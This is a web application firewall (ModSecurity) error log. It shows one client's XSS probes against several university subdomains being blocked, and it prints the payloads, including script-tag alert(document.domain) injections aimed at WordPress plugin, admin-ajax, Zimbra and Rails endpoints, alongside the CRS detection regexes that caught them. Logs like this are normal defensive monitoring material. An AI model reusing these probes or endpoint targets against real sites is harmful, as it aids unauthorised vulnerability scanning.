[Tue Aug 29 11:51:53.931474 2023] [:error] [pid 2532] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:size. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:size: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/parsi-font/css.php"] [unique_id "ZO15acCo-f0AAAnkwcgAAAAY"]
[Tue Aug 29 11:51:53.992266 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:size. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:size: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/parsi-font/css.php"] [unique_id "ZO15acCo-f0AAAnd3CMAAAAI"]
[Tue Aug 29 11:51:54.596807 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchstring. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22</ found within ARGS:searchstring: '>\\x22</script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/search.htm"] [unique_id "ZO15asCo-f0AAAnIllgAAAAV"]
[Tue Aug 29 11:51:54.605757 2023] [:error] [pid 2526] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:size. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:size: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/parsi-font/css.php"] [unique_id "ZO15asCo-f0AAAnepQUAAAAK"]
[Tue Aug 29 11:51:54.627467 2023] [:error] [pid 2502] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:message. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:message: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15asCo-f0AAAnGkMIAAAAR"]
[Tue Aug 29 11:51:55.715508 2023] [:error] [pid 2548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:message. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:message: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15a8Co-f0AAAn0GYsAAAAa"]
[Tue Aug 29 11:51:55.723796 2023] [:error] [pid 2528] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:table. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:table: event</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO15a8Co-f0AAAngCWcAAAAP"]
[Tue Aug 29 11:51:55.723914 2023] [:error] [pid 2534] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:table. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:table: event</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO15a8Co-f0AAAnmT4sAAAAd"]
[Tue Aug 29 11:51:55.733812 2023] [:error] [pid 2532] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:table. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:table: event</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO15a8Co-f0AAAnkwcsAAAAY"]
[Tue Aug 29 11:51:55.816535 2023] [:error] [pid 2440] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:message. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:message: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15a8Co-f0AAAmIbTYAAAAo"]
[Tue Aug 29 11:51:55.827772 2023] [:error] [pid 2534] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:table. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:table: event</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO15a8Co-f0AAAnmT4wAAAAd"]
[Tue Aug 29 11:51:55.861417 2023] [:error] [pid 2557] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:message. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:message: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15a8Co-f0AAAn958QAAAAD"]
[Tue Aug 29 11:51:55.941003 2023] [:error] [pid 2526] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:table. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:table: event</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO15a8Co-f0AAAnepQgAAAAK"]
[Tue Aug 29 11:51:55.965293 2023] [:error] [pid 2440] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:message. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:message: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15a8Co-f0AAAmIbTcAAAAo"]
[Tue Aug 29 11:51:55.985544 2023] [:error] [pid 2526] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:message. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:message: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15a8Co-f0AAAnepQkAAAAK"]
[Tue Aug 29 11:51:56.544685 2023] [:error] [pid 2534] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:location. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )//\\x0a found within ARGS:location: \\x0djavascript:alert(1)//\\x0aaaaaa"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/rails/actions"] [unique_id "ZO15bMCo-f0AAAnmT44AAAAd"]
[Tue Aug 29 11:51:56.545374 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:location. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )//\\x0a found within ARGS:location: \\x0djavascript:alert(1)//\\x0aaaaaa"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/rails/actions"] [unique_id "ZO15bMCo-f0AAAnn1@8AAAAe"]
[Tue Aug 29 11:51:56.564930 2023] [:error] [pid 2532] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:location. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )//\\x0a found within ARGS:location: \\x0djavascript:alert(1)//\\x0aaaaaa"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/rails/actions"] [unique_id "ZO15bMCo-f0AAAnkwc4AAAAY"]
[Tue Aug 29 11:51:56.591651 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:location. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )//\\x0a found within ARGS:location: \\x0djavascript:alert(1)//\\x0aaaaaa"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/rails/actions"] [unique_id "ZO15bMCo-f0AAAfWOJoAAAAL"]
[Tue Aug 29 11:51:56.594490 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:location. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )//\\x0a found within ARGS:location: \\x0djavascript:alert(1)//\\x0aaaaaa"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/rails/actions"] [unique_id "ZO15bMCo-f0AAAni@88AAAAU"]
[Tue Aug 29 11:51:56.599859 2023] [:error] [pid 2529] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:table. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:table: event</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO15bMCo-f0AAAnh6OEAAAAS"]
[Tue Aug 29 11:51:57.542343 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:location. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )//\\x0a found within ARGS:location: \\x0djavascript:alert(1)//\\x0aaaaaa"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/rails/actions"] [unique_id "ZO15bcCo-f0AAAni@9AAAAAU"]
[Tue Aug 29 11:51:57.568222 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22\\x22></ found within ARGS:id: \\x22\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/zimbra/h/search"] [unique_id "ZO15bcCo-f0AAAnIlmAAAAAV"]
[Tue Aug 29 11:51:57.594909 2023] [:error] [pid 2500] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22\\x22></ found within ARGS:id: \\x22\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/zimbra/h/search"] [unique_id "ZO15bcCo-f0AAAnEqUQAAAAO"]
[Tue Aug 29 11:51:57.598616 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22\\x22></ found within ARGS:id: \\x22\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/zimbra/h/search"] [unique_id "ZO15bcCo-f0AAAnd3CkAAAAI"]
[Tue Aug 29 11:51:57.625035 2023] [:error] [pid 2502] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22\\x22></ found within ARGS:id: \\x22\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/zimbra/h/search"] [unique_id "ZO15bcCo-f0AAAnGkMcAAAAR"]
[Tue Aug 29 11:51:57.636012 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22\\x22></ found within ARGS:id: \\x22\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/zimbra/h/search"] [unique_id "ZO15bcCo-f0AAAm7nEYAAAAE"]
